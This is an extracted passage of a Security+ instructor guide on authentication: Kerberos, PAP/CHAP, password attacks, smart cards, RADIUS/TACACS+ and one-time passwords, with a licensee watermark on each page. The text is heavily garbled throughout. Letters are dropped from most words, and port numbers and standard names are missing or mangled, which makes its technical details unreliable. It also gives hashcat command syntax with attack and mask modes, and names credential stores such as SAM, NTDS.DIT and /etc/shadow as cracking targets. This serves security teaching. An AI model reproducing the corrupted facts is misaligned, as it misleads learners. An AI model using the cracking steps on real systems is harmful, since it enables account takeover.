 152 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Authentication Attributes

Authentication
Compared to the three main authentication factors, an authentication attribute is
Attributes either a non uni ue property or a factor that cannot be used independently.

Teaching Somewhere You Are Authentication

Tip
Attributes can be
Location based authentication measures some statistic about where you are. This
distinguished from could be a geographic location, measured using a device's location service, or it could
factors as information be by I address. A device's I address could be used to refer to a logical network
that is not uni ue or segment, or it could be linked to a geographic location using a geolocation service.
that is not reliable fast ithin a premises network, the physical port location, virtual LAN LAN , or i i
enough to use as a network can also be made the basis of location based authentication.
primary authentication
mechanism. Location based authentication is not used as a primary authentication factor, but
Attributes can be it may be used as a continuous authentication mechanism or as an access control
used for secondary
feature. or e ample, if a user enters the correct credentials at a N gateway but his
or continuous
authentication access or her I address shows him her to be in a di erent country than e pected, access
control mechanisms. controls might be applied to restrict the privileges granted or refuse access completely.
Another e ample is where a user appears to login from di erent geographic locations
that travel time would make physically impossible.

Something You Can Do Authentication

ehavioral characteristics, such as the way you walk or the way you hold your
smartphone, can uni uely identify you to a considerable degree of activity. Although
this factor is impractical to use for primary authentication, it can be used for conte tual
and continual authentication to ensure that a device continues to be operated by the
owner.

Something You Exhibit Authentication

Something you exhibit also refers to behavioral based authentication and authori ation,
with specific emphasis on personality traits. or e ample, the way you use smartphone
apps or web search engines might conform to a pattern of behavior that can be
captured by machine learning analysis as a statistical template. If someone else uses
the device, their behavior will be di erent, and this anomalous pattern could be used
to lock the device and re uire re authentication.

Someone You Know Authentication

A someone you know authentication scheme uses a web of trust model, where new
users are vouched for by e isting users. As the user participates in the network, their
identity becomes better established. ne e ample is the decentrali ed web of trust
model, used by retty ood rivacy as an alternative to I weboftrust.info
inde .html .

Lesson 7: Implementing Authentication Controls | Topic 7A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 153

Review Activity:
Authentication Design Concepts
Answer the following uestions

1. hat is the di erence et een authori ation and authentication

Authorization means granting the account that has been configured for the user on
the computer system the right to make use of a resource. Authori ation manages
the privileges granted on the resource. Authentication protects the validity of the user
account by testing that the person accessing that account is who she he says she he is.

2. hat steps should e ta en to enroll a ne emplo ee on a domain net or

erform checks to confirm the user's identity, issue authentication credentials securely,
assign appropriate permissions privileges to the account, and ensure accounting
mechanisms to audit the user's activity.

3. True or alse An account re uirin a pass ord I and smart card is an

example of three-factor authentication.

alse Three factor authentication also includes a biometric , behavioral , or location

based element. The password and IN elements are the same factor something
you know .

4. hat methods can e used to implement location ased authentication

ou can uery the location service running on a device or geolocation by I . ou could

use location with the network, based on switch port, wireless network name, virtual
LAN LAN , or I subnet.

Lesson 7: Implementing Authentication Controls | Topic 7A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 154 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 7B
Implement Knowledge-Based
Authentication

Teaching EXAM OBJECTIVES COVERED

Tip 1. Given a scenario, analyze potential indicators to determine the type of attack
. Given a scenario, implement authentication and authorization solutions
This topic focuses on
the implementation
.1 Given a scenario, use the appropriate tool to assess organizational security (password
of knowledge factor crackers only)
mechanisms, including
attacks on password Knowledge-based authentication refers primarily to issuing users with password based
credentials. account access mechanisms. Configuring password based authentication protocols
and supporting users with authentication issues is an important part of the information
security role. In this topic, you will learn how some common authentication protocols
work and about the ways that they can be put at risk by password cracking techni ues.

Show Slide(s) Local, Network, and Remote Authentication

Local, Network,
ne of the most important features of an operating system is the authentication
and Remote provider, which is the software architecture and code that underpins the mechanism
Authentication by which the user is authenticated before starting a shell. This is usually described
as a login Linu or a logon or sign in Microsoft . nowledge based authentication,
Teaching using a password or personal identification number IN , is the default authentication
Tip provider for most operating systems.
The syllabus does
not mention local nowledge based authentication relies on cryptographic hashes. A plainte t password
authentication is not usually transmitted or stored in a credential database because of the risk of
specifically, although compromise. Instead, the password is stored as a cryptographic hash. hen a user
AM is in the enters a password to log in, an authenticator converts what is typed into a hash and
acronyms list. It is wise
transmits that to an authority. The authority compares the submitted hash to the one
to check that students
grasp the basics. in the database and authenticates the sub ect only if they match.

Windows Authentication
indows authentication involves a comple architecture of components docs.
microsoft.com en us windows server security windows authentication credentials
processes in windows authentication , but the following three scenarios are typical
• indows local sign in the Local ecurity Authority L A compares the submitted
credential to a hash stored in the ecurity Accounts Manager AM database, which
is part of the registry. This is also referred to as interactive logon.

• indows network sign in the L A can pass the credentials for authentication to
a network service. The preferred system for network authentication is based on
erberos, but legacy network applications might use NT LAN Manager (NTLM)
authentication.

• emote sign in if the user's device is not connected to the local network,
authentication can take place over some type of virtual private network N or
web portal.

Lesson 7: Implementing Authentication Controls | Topic 7B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 155

Linux Authentication
In Linu , local user account names are stored in /etc/passwd. hen a user logs
in to a local interactive shell, the password is checked against a hash stored in /etc/
shadow. Interactive login over a network is typically accomplished using ecure hell
. ith , the user can be authenticated using cryptographic keys instead of a
password.
A plu a le authentication module A is a package for enabling di erent
authentication providers, such as smart card login tecmint.com configure pam
in centos ubuntu linu . The AM framework can also be used to implement
authentication to network servers.

Single Sign-On (SSO)

A single sign-on (SSO) system allows the user to authenticate once to a local device
and be authenticated to compatible application servers without having to enter
credentials again. In indows, is provided by the erberos framework.

Kerberos Authentication Show Slide(s)

Kerberos is a single sign on network authentication and authori ation protocol used erberos
on many networks, notably as implemented by Microsoft's Active Directory AD Authentication
service. erberos was named after the three headed guard dog of ades Cerberus
because it consists of three parts. Clients re uest services from application servers, Teaching
which both rely on an intermediary a Key Distribution Center (KDC) to vouch for Tip
their identity. There are two services that make up a DC the Authentication ervice erberos can be
and the Ticket ranting ervice. The DC runs on port using TC or D . difficult to follow, with
multiple use of secret
and session keys from
di erent sources.
tress the main point
that erberos provides
single sign on through
the use of tickets or
tokens.
Note the use of
time stamping to
defeat replay attacks
and the use of
symmetric, rather
than asymmetric,
encryption i.e.,
contrast erberos with
I.

Teaching
Tip
The server can decrypt
erberos Authentication Service. (Images 1 .com.) the re uest because
it holds a copy of the
user's password hash.
The Authentication ervice is responsible for authenticating user logon re uests. More This shows that the
generally, users and services can be authenticated these are collectively referred to user has entered the
as principals. or e ample, when you sit at a indows domain workstation and log correct password and
on to a realm or domain , the first step of logon is to authenticate with a DC server, that the system time
implemented as a domain controller. is valid.

1. The client sends the authentication service A a re uest for a Ticket Granting
Ticket (TGT). This is composed by encrypting the date and time on the local
computer with the user's password hash as the key.

Lesson 7: Implementing Authentication Controls | Topic 7B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 156 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

The password hash itself is not transmitted over the network. Also, although we refer
to passwords for simplicity, the system can use other authentication providers, such as
smart-card logon.

The Ticket Granting Ticket (TGT or user ticket) is time-stamped (under indows, they have
a default maximum age of 10 hours). This means that workstations and servers on the
network must be synchronized (to within five minutes) or a ticket will be re ected. This helps
prevent replay attacks.

2. The A checks that the user account is present, that it can decode the re uest by
matching the user's password hash with the one in the Active Directory database,
and that the re uest has not e pired. If the re uest is valid, the A responds with
the following data

• Ticket ranting Ticket T T this contains information about the client name
and I address plus a timestamp and validity period. This is encrypted using
the DC's secret key.

• T session key for use in communications between the client and the Ticket
ranting ervice T . This is encrypted using a hash of the user's password.

The T T is an e ample of a logical token. All the T T does is identify who you are and
confirm that you have been authenticated it does not provide you with access to any
domain resources.

Show Slide(s) er eros Authori ation

erberos
resuming the user entered the correct password, the client can decrypt the Ticket
Authori ation ranting ervice T session key but not the T T. This establishes that the client and
DC know the same shared secret and that the client cannot interfere with the T T.
Teaching
Tip
1. To access resources within the domain, the client re uests a ervice Ticket a
token that grants access to a target application server . This process of granting
The client does not
know the application
service tickets is handled by the T .
server's password
and vice versa. nly
2. The client sends the T a copy of its T T and the name of the application server
the DC knows both it wishes to access plus an authenticator, consisting of a time stamped client ID
passwords. encrypted using the T session key.

The T should be able to decrypt both messages using the DC's secret key for
the first and the T session key for the second. This confirms that the re uest
is genuine. It also checks that the ticket has not e pired and has not been used
before replay attack .

3. The T service responds with

• ervice session key for use between the client and the application server.
This is encrypted with the T session key.

• ervice ticket containing information about the user, such as a timestamp,

system I address, ecurity Identifier ID and the IDs of groups to which
he or she belongs, and the service session key. This is encrypted using the
application server's secret key.

4. The client forwards the service ticket, which it cannot decrypt, to the application
server and adds another time stamped authenticator, which is encrypted using
the service session key.

Lesson 7: Implementing Authentication Controls | Topic 7B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 157

erberos Ticket Granting Service. (Images 1 .com.)

5. The application server decrypts the service ticket to obtain the service session
key using its secret key, confirming that the client has sent it an untampered
message. It then decrypts the authenticator using the service session key.

6. ptionally, the application server responds to the client with the timestamp used
in the authenticator, which is encrypted by using the service session key. The
client decrypts the timestamp and verifies that it matches the value already sent,
and concludes that the application server is trustworthy.
Show Slide(s)
This means that the server is authenticated to the client referred to as mutual
authentication . This prevents a man in the middle attack, where a malicious user A , C A , and M
could intercept communications between the client and server. C A Authentication

7. The server now responds to client re uests assuming they conform to the Teaching
server's access control list . Tip
ven though there
The data transfer itself is not encrypted (at least as part of erberos some sort of transport aren't too many
encryption can be deployed). scenarios where either
C A or A are
chosen these days,
remind students that
some e am uestions
ne of the noted drawbacks of erberos is that the DC represents a single point
might not re ect
of failure for the network. In practice, backup DC servers can be implemented for the legacy nature of
e ample, Active Directory supports multiple domain controllers, each of which are some technologies.
running the DC service . These protocols can
be deployed more or
less securely within an
A C A and C A Authentication encrypted tunnel L
or , for instance .
erberos is designed to work over a trusted local network. everal authentication The idea here is that
protocols have been developed to work with remote access protocols, where the you use I certificates
connection is made over a serial link or virtual private network N. for machine
authentication,
then perform user
ass ord Authentication rotocol A authentication
through the secure
The ass ord Authentication rotocol A is an unsophisticated authentication tunnel. ee the topic
method developed as part of the oint to oint rotocol , used to transfer TC on A .

Lesson 7: Implementing Authentication Controls | Topic 7B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 158 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

I data over serial or dial up connections. It is also used as the basic authentication
mechanism in TT . It relies on clear te t password e change and is therefore obsolete
for most purposes, e cept through an encrypted tunnel.

Challen e andsha e Authentication rotocol C A

The Challen e andsha e Authentication rotocol C A was also developed as
part of as a means of authenticating users over a remote link. C A relies on an
encrypted challenge in a system called a three-way handshake.
1. Challenge the server challenges the client, sending a randomly generated
challenge message.

2. esponse the client responds with a hash calculated from the server challenge
message and client password or other shared secret .

3. erification the server performs its own hash using the password hash stored
for the client. If it matches the response, then access is granted otherwise, the
connection is dropped.

The handshake is repeated with a di erent challenge message periodically during the
connection although transparent to the user . This guards against replay attacks, in
which a previous session could be captured and reused to gain access.
C A is Microsoft's implementation of C A . ecause of the way it uses
vulnerable NTLM hashes, M C A should not be deployed without the protection of a
secure connection tunnel so that the credentials being passed are encrypted.

efining allowed authentication mechanisms on a indows P .

(Screenshot used with permission from Microsoft.)

Lesson 7: Implementing Authentication Controls | Topic 7B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 159

ass ord Attac s Show Slide(s)

hen a user chooses a password, the password is converted to a hash using a assword Attacks
cryptographic function, such as MD or A. This means that, in theory, no one
e cept the user not even the system administrator knows the password, because the Teaching
plainte t should not be recoverable from the hash. Tip
The best defense
lainte t nencr pted Attac s against password
crackers is to ensure
A plaintext unencrypted attack e ploits password storage or a network authentication the use of strong
protocol that does not use encryption. amples include A , basic TT T passwords and not
authentication, and Telnet. These protocols must not be used. asswords must to use clear te t
protocols, of course .
never be saved to an unmanaged file. ne common source of credential breaches is
ou must also restrict
passwords embedded in application code that has subse uently been uploaded to a access to password
public repository. databases carefully
to try to prevent any
Online Attacks sort of eavesdropper
from running on your
An online password attack is where the threat actor interacts with the authentication networks.
service directly a web login form or N gateway, for instance. The attacker submits
passwords using either a database of known passwords and variations or a list of
passwords that have been cracked o ine.

Also, be aware that there are databases of username and password password hash
combinations for multiple accounts stored across the Internet. These details derive from
successful hacks of various companies systems. These databases can be searched using a
site such as haveibeenpwned.com.

An online password attack can show up in audit logs as repeatedly failed logons and
then a successful logon, or as successful logon attempts at unusual times or locations.
Apart from ensuring the use of strong passwords by users, online password attacks
can be mitigated by restricting the number or rate of logon attempts, and by shunning
logon attempts from known bad I addresses.

ote that restricting logons can be turned into a vulnerability as it exposes the account to
denial of service attacks. The attacker keeps trying to authenticate, locking out valid users.

ass ord pra in

ass ord spra in is a hori ontal brute force online attack. This means that the
attacker chooses one or more common passwords for e ample, password or
123456 and tries them in con unction with multiple usernames.
ine Attac s
An o ine attack means that the attacker has managed to obtain a database of
password hashes, such as % ystem oot% ystem32 config ,
%SystemRoot%\NTDS\NTDS.DIT the Active Directory credential store , or /
etc/shadow. nce the password database has been obtained, the cracker does not
interact with the authentication system. The only indicator of this type of attack other
than misuse of the account in the event of a successful attack is a file system audit log
that records the malicious account accessing one of these files. Threat actors can also
read credentials from host memory, in which case the only reliable indicator might be
the presence of attack tools on a host.
If the attacker cannot obtain a database of passwords, a packet sni er might be used
to obtain the client response to a server challenge in a protocol such as NTLM or

Lesson 7: Implementing Authentication Controls | Topic 7B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 160 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

C A M C A . Although these protocols avoid sending the hash of the password

directly, the response is derived from it in some way. assword crackers can e ploit
weaknesses in a protocol to calculate the hash and match it to a dictionary word or
brute force it.

Show Slide(s) Brute-Force and Dictionary Attacks

rute orce and
ome password attacks e ploit the weak credentials chosen by users. thers can
Dictionary Attacks e ploit vulnerabilities in the storage mechanism. or e ample, the indows AM
database can be configured to store hashes for compatibility with older versions LM
Teaching and NTLMv hashes . These legacy hashes are cryptographically weak and highly
Tip vulnerable to password cracking ldapwiki.com wiki LM hash .
ou might want
to note the use of Brute-Force Attack
machine learning to
facilitate brute force A brute-force attack attempts every possible combination in the output space in
attacks darkreading. order to match a captured hash and guess at the plainte t that generated it. The
com analytics output space is determined by the number of bits used by the algorithm bit MD
passgan password
or bit A , for instance . The larger the output space and the more characters
cracking using
machine learning d d that were used in the plainte t password, the more difficult it is to compute and test
id . each possible hash to find a match. rute force attacks are heavily constrained by
time and computing resources, and are therefore most e ective at cracking short
Interaction passwords. owever, brute force attacks distributed across multiple hardware
Opportunity components, like a cluster of high end graphics cards, can be successful at cracking
ou can direct longer passwords.
students to a brute
force calculator to test Dictionary and Rainbow Table Attacks
a few passwords grc.
com haystack.htm, for A dictionary attack can be used where there is a good chance of guessing the likely
e ample . value of the plainte t, such as a non comple password. The software generates hash
values from a dictionary of plainte ts to try to match one to a captured hash. Rainbow
table attacks refine the dictionary approach. The attacker uses a precomputed lookup
table of all possible passwords and their matching hashes. Not all possible hash
values are stored, as this would re uire too much memory. alues are computed
in chains, and only the first and last values need to be stored. The hash value of a
stored password can then be looked up in the table and the corresponding plainte t
discovered.
sing a salt to add a random value to the stored plainte t helps to slow down
rainbow table attacks, because the tables cannot be created in advance and must be
recreated for each combination of password and salt value. ainbow tables are also
impractical when trying to discover long passwords more than about characters .
NI and Linu password storage mechanisms use salt, but indows does not.
Conse uently, in a indows environment, it is even more important to enforce strong
password policies.

Hybrid Attack
A hybrid password attack uses a combination of dictionary and brute force attacks.
It is principally targeted against na ve passwords with inade uate comple ity, such
as james1. The password cracking algorithm tests dictionary words and names in
combination with a mask that limits the number of variations to test for, such as adding
numeric prefi es and or suffi es. ther types of algorithms can be applied, based on
what hackers know about how users behave when forced to select comple passwords
that they don't really want to make hard to remember. ther e amples might include
substituting s with or o with .

Lesson 7: Implementing Authentication Controls | Topic 7B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 161

ass ord Crac ers Show Slide(s)

Although there are some indows tools, including the infamous Cain and L phtcrack assword Crackers
l phtcrack.com tools, most password crackers run primarily on Linu . or e ample, a
tool such as Hashcat hashcat.net hashcat is run using the following general synta
hashcat -m ash ype -a ttack ode -o utput ile
nput ash ile
The input file should contain hashes of the same type, using the specified format
hashcat.net wiki doku.php id e ample hashes . ashcat can be used with a single
word list dictionary mode -a 0 or multiple word lists combinator mode -a 1 .
Mode -a 3 performs a brute force attack, but this can be combined with a mask for
each character position. This reduces the key space that must be searched and speeds
up the attack. or e ample, you might learn or intuit that a company uses only letter
characters in passwords. y omitting numeric and symbol characters, you can speed
up the attack on each hash.

unning a masked brute-force attack this example is running on a , so the recovery rate is very low.
(Screenshot hashcat hashcat.net/hashcat.)

Authentication Management Show Slide(s)

sers often adopt poor credential management practices that are very hard to control, Authentication
such as using the same password for corporate networks and consumer websites. This Management
makes enterprise network security vulnerable to data breaches from these websites.
An authentication management solution for passwords mitigates this risk by using a
device or service as a pro y for credential storage. The manager generates a uni ue,
strong password for each web based account. The user authori es the manger to
authenticate with each site using a master password.
assword managers can be implemented with a hardware token or as a software app
• assword key tokens for connecting to Cs and smartphones. ome can
use nearfield communications N C or luetooth as well as physical connectivity
theverge.com the best hardware security keys yubico titan
key u f .

Lesson 7: Implementing Authentication Controls | Topic 7B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 162 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• assword vault software based password manager, typically using a cloud service
to allow access from any device pcmag.com picks the best password managers .
A key is also likely to use a vault for backup. Most operating systems and
browsers implement native password vaults. amples include indows Credential
Manager and Apple's iCloud eychain imore.com icloud keychain .

Authentication management products can be certified under the ederal Information

Processing Standard ( IPS 1 0- ). This provides assurance that the cryptographic
implementation meets a certain level of robustness.

Lesson 7: Implementing Authentication Controls | Topic 7B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 163

Review Activity:
Knowledge-Based Authentication
Answer the following uestions

1. h mi ht a I e a particularl ea t pe o somethin ou no
authentication

A long personal identification number IN is difficult for users to remember, but

a short IN is easy to crack. A IN can only be used safely where the number of
se uential authentication attempts can be strictly limited.

2. In hat scenario ould A e considered a secure authentication method

A is a legacy protocol that cannot be considered secure because it transmits

plainte t A CII passwords and has no cryptographic protection. The only way to ensure
the security of A is to ensure that the endpoints established a secure tunnel using
I ec, for instance .

3. True or alse In order to create a ser ice tic et er eros passes the user s
password to the target application server for authentication.

alse only the DC verifies the user credential. The Ticket ranting ervice T
sends the user's account details ID to the target application for authori ation
allocation of permissions , not authentication.

4. A user maintains a list o commonl used pass ords in a file located

deep ithin the computer s director structure Is this secure pass ord
mana ement

No. This is security by obscurity. The file could probably be easily discovered using
search tools.

5. hich propert o a plainte t pass ord is most e ecti e at de eatin a

rute orce attac

The length of the password. If the password does not have any comple ity if it is ust
two dictionary words, for instance , it may still be vulnerable to a dictionary based
attack. A long password may still be vulnerable if the output space is small or if the
mechanism used to hash the password is faulty LM hashes being one e ample .

Lesson 7: Implementing Authentication Controls | Topic 7B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 164 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 7C
Implement Authentication Technologies

Teaching EXAM OBJECTIVES COVERED

Tip 2.4 Summarize authentication and authorization design concepts
. Given a scenario, implement secure network designs ( S only)
This topic covers the
ownership factor. As
. Given a scenario, implement authentication and authorization solutions
well as smart cards,
Ms, and tokens, Authentication technologies can be used as a something you have or ownership
we look at A and possession factor. Many organi ations are deploying multifactor authentication
ADI TACAC systems based on smart cards and key fobs. ou are likely to have to support the
as certificate based
installation and configuration of these technologies during your career.
authentication
mechanisms.
Show Slide(s) mart Card Authentication
Smart-card authentication means programming cryptographic information onto
mart Card a card e uipped with a secure processing chip. The chip stores the user's digital
Authentication
certificate, the private key associated with the certificate, and a personal identification
Teaching number IN used to activate the card.
Tip or erberos authentication, smart card logon works as follows
Multifactor
1. The user presents the smart card to a reader and is prompted to enter a IN.
authentication is
a strong solution 2. Inputting the correct IN authori es the smart card's cryptoprocessor to use its
but can also be an
e pensive one. Along
private key to create a Ticket ranting Ticket T T re uest, which is transmitted
with hardware and to the authentication server A .
software costs, there
may be additional
3. The A is able to decrypt the re uest because it has a matching public key and
support costs when trusts the user's certificate, either because it was issued by a local certification
authentication fails authority or by a third party CA that is a trusted root CA.
and a valid user
cannot access the 4. The A responds with the T T and Ticket ranting ervice T session key.
network.
Smart card can refer to a wide range of different technologies. Secure erberos-based
authentication re uires a card with a cryptoprocessor (smartcardbasics.com/smart-card-
types.html).

Show Slide(s)
Key Management Devices
ey Management hen using public key infrastructure I for smart card authentication, the security of
Devices the private key issued to each user is critical. ne problem is that only the user should
ever be in ownership of the private key. If the network administrator is able to view these
Teaching
keys, they can impersonate any sub ect. arious technologies can be used to avoid the
Tip
need for an administrator to generate a private key and transmit it to the user
Although CAC and I
are no longer content • mart card some cards are powerful enough to generate key material using the
e amples, they are cryptoprocessor embedded in the card.
still in the acronyms
list. There are glossary • key a cryptoprocessor can also be implemented in the form factor.
terms for both, if you
want to draw students' • Trusted latform Module T M a secure cryptoprocessor enclave implemented on
attention to them. a C, laptop, smartphone, or network appliance. The T M is usually a module within

Lesson 7: Implementing Authentication Controls | Topic 7C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 165

the C . Modification of T M data is only permitted by highly trusted processes. A

T M can be used to present a virtual smart card docs.microsoft.com en us windows
security identity protection virtual smart cards virtual smart card overview .

mart cards, keys, and virtual smart cards are provisioned as individual devices.
ften keys need to be provisioned to non user devices too, such as servers and
network appliances. A hardware security module (HSM) is a network appliance
designed to perform centrali ed I management for a network of devices. This means
that it can act as an archive or escrow for keys in case of loss or damage. Compared
to using a general purpose server for certificate services, Ms are optimi ed for
the role and so have a smaller attack surface. Ms are designed to be tamper
evident to mitigate risk of insider threat, and can also provide enterprise strength
cryptographically secure pseudorandom number generators C N s. Ms can be
implemented in several form factors, including rack mounted appliances, plug in CIe
adapter cards, and connected e ternal peripherals.

The IPS 1 0- scheme provides accreditation for cryptographically strong products.

(ncipher.com fa key-secrets-management what-fips-1 0- .)

Smart card, smart card reader, and hardware security module (Images 1 .com.)

tensi le Authentication rotocol I Show Slide(s)

The smart card authentication process described earlier is used for erberos
Extensible
authentication where the computer is attached to the local network and the user is Authentication
logging on to indows. Authentication may also be re uired in other conte ts rotocol I .
• hen the user is accessing a wireless network and needs to authenticate with the
Teaching
network database.
Tip
• hen a device is connecting to a network via a switch and network policies re uire e introduce A
the user to be authenticated before the device is allowed to communicate. and AAA servers here
as part of certificate
• hen the user is connecting to the network over a public network via a virtual based authentication
private network N. and ob ective . ,
but we will also look
In these scenarios, the tensi le Authentication rotocol A provides a at port security NAC
framework for deploying multiple types of authentication protocols and technologies. and i i enterprise
A allows lots of di erent authentication methods, but many of them use a digital authentication later in
the course.
certificate on the server and or client machines. This allows the machines to establish
a trust relationship and create a secure tunnel to transmit the user credential or to
perform smart card authentication without a user password.

Lesson 7: Implementing Authentication Controls | Topic 7C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 166 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

here A provides the authentication mechanisms, the I ort based

Network Access Control NAC protocol provides the means of using an A method
when a device connects to an thernet switch port, wireless access point with
enterprise authentication configured , or N gateway. . uses authentication,
authori ation, and accounting AAA architecture
• Supplicant the device re uesting access, such as a user's C or laptop.

• Network access server NA edge network appliances, such as switches, access

points, and N gateways. These are also referred to as A IUS clients or authenticators.

• AAA server the authentication server, positioned within the local network.

ith AAA, the NA devices do not have to store any authentication credentials. They
forward this data between the AAA server and the supplicant. There are two main
types of AAA server ADI and TACAC .

Show Slide(s) Remote Authentication Dial-in User Service

emote Authentication
The Remote Authentication Dial-in User Service (RADIUS) standard is published as
Dial in ser ervice an Internet standard. There are several ADI server and client products.
The NA device ADI client is configured with the I address of the ADI server
and with a shared secret. This allows the client to authenticate to the server. emember
that the client is the access device switch, access point, or N gateway , not the user's
C or laptop. A generic ADI authentication work ow proceed as follows
1. The user's device the supplicant makes a connection to the NA appliance, such
as an access point, switch, or remote access server.

A IUS authentication with EAP overview. (Images 1 .com.)

2. The NA prompts the user for their authentication credentials. ADI supports
A , C A , and A . Most implementations now use A , as A and C A
are not secure. If A credentials are re uired, the NA enables the supplicant

Lesson 7: Implementing Authentication Controls | Topic 7C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 167

to transmit A o er A A o data, but does not allow any other type of

network traffic.

3. The supplicant submits the credentials as A oL data. The ADI client uses
this information to create an Access e uest ADI packet, encrypted using the
shared secret. It sends the Access e uest to the AAA server using D on port
by default .

4. The AAA server decrypts the Access e uest using the shared secret. If the
Access e uest cannot be decrypted because the shared secret is not correctly
configured, for instance , the server does not respond.

5. ith A , there will be an e change of Access Challenge and Access e uest

packets as the authentication method is set up and the credentials verified.
The NA acts as a pass thru, taking ADI messages from the server, and
encapsulating them as A oL to transmit to the supplicant.

6. At the end of this e change, if the supplicant is authenticated, the AAA server
responds with an Access Accept packet otherwise, an Access e ect packet
is returned.

ptionally, the NA can use ADI for accounting logging . Accounting uses port
. The accounting server can be di erent from the authentication server.

Terminal Access Controller Access-Control System Show Slide(s)

ADI is used primarily for network access control. AAA services are also used for the Terminal Access
purpose of centrali ing logins for the administrative accounts for network appliances. Controller Access
This allows network administrators to be allocated specific privileges on each switch, Control ystem
router, access point, and firewall. hereas ADI can be used for this network
appliance administration role, the Cisco developed Terminal Access Controller
Access Control stem lus TACAC is specifically designed for this purpose
https www.cisco.com c en us support docs security vpn remote authentication dial
user service radius .html
• TACAC uses TC communications over port , and this reliable, connection
oriented delivery makes it easier to detect when a server is down.

• All the data in TACAC packets is encrypted e cept for the header identifying the
packet as TACAC data , rather than ust the authentication data. This ensures
confidentiality and integrity when transferring critical network infrastructure data.

• Authentication, authori ation, and accounting functions are discrete. Many device
management tasks re uire reauthentication similar to having to re enter a
password for sudo or AC and per command authori ations and privileges for
users, groups, and roles. TACAC supports this work ow better than ADI .

Token Keys and Static Codes Show Slide(s)

mart card authentication works well when you have close control over user accounts Token eys and tatic
and the devices used on the network. ther types of ownership based authentication Codes
technologies use various hardware and software tokens. These avoid some of
the management issues of using the digital certificates re uired by smart card Teaching
authentication. Tip
ID is not on the
A one time pass ord T is one that is generated automatically, rather than being
syllabus, but it is worth
chosen by a user, and used only once. Conse uently, it is not vulnerable to password mentioning in terms of
guessing or sniffing attacks. An T is generated using some sort of hash function on a general awareness of
secret value plus a synchroni ation value seed , such as a timestamp or counter. token key methods.

Lesson 7: Implementing Authentication Controls | Topic 7C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 168 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

ey fob token generator. (Image 1 .com.)

The ecurID token from A represents one popular implementation of an T token

key. The device generates a passcode based on the current time and a secret key
coded into the device. The code is entered along with a IN or password known only
to the user. Network access devices must be configured with an agent to intercept the
credentials and direct them to an Authentication Manager server for validation. This
server can integrate with directory products, such as AD.
There are also simpler token keys and smart cards that simply transmit a static token
programmed into the device. or e ample, many building entry systems work on the
basis of static codes. These mechanisms are highly vulnerable to cloning and replay
attacks.
There are many other ways of implementing hardware token keys. or e ample, a
ast Identity nline ID niversal econd actor token registers a public
key with the authentication service. The authentication mechanism then re uires the
private key locked to the token, which is authori ed using IN or fingerprint activation
fidoalliance.org showcase fido u f security key . This can also be used with the
indows ello authentication provider microsoft.com security blog
advancing windows passwordless platform .

Show Slide(s) Open Authentication

pen Authentication
The Initiative for Open Authentication (OATH) is an industry body established
with the aim of developing an open, strong authentication framework. Open means
a system that any enterprise can link into to perform authentication of users and
devices across di erent networks. Strong means that the system is based not ust on
passwords, but also on or factor authentication or on step verification. AT has
developed two algorithms for implementing one time passwords T s .

AC ased ne Time ass ord Al orithm T

AC ased ne time ass ord Al orithm T is an algorithm for token based
authentication tools.ietf.org html rfc . The authentication server and client token
are configured with the same shared secret. This should be an byte value generated
by a cryptographically strong random number generator. The token could be a fob type
device or implemented as a smartphone authentication authenticator app. The shared
secret can be transmitted to the smartphone app as a code image ac uirable by
the phone's camera so that the user doesn't have to type anything. bviously, it is
important that no other device is able to ac uire the shared secret. The shared secret
is combined with a counter to create a one time password when the user wants to

Lesson 7: Implementing Authentication Controls | Topic 7C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 169

authenticate. The device and server both compute the hash and derive an T value
that is digits long. This is the value that the user must enter to authenticate with the
server. The counter is incremented by one.

The server is configured with a counter window to cope with the circumstance that the
device and server counters move out of sync. This could happen if the user generates an
OTP but does not use it, for instance.

Time ased ne Time ass ord Al orithm T T

The Time ased ne time ass ord Al orithm T T is a refinement of the T
tools.ietf.org html rfc . ne issue with T is that tokens can be allowed to
persist une pired, raising the risk that an attacker might be able to obtain one and
decrypt data in the future. In T T , the MAC is built from the shared secret plus a
value derived from the device's and server's local timestamps. T T automatically
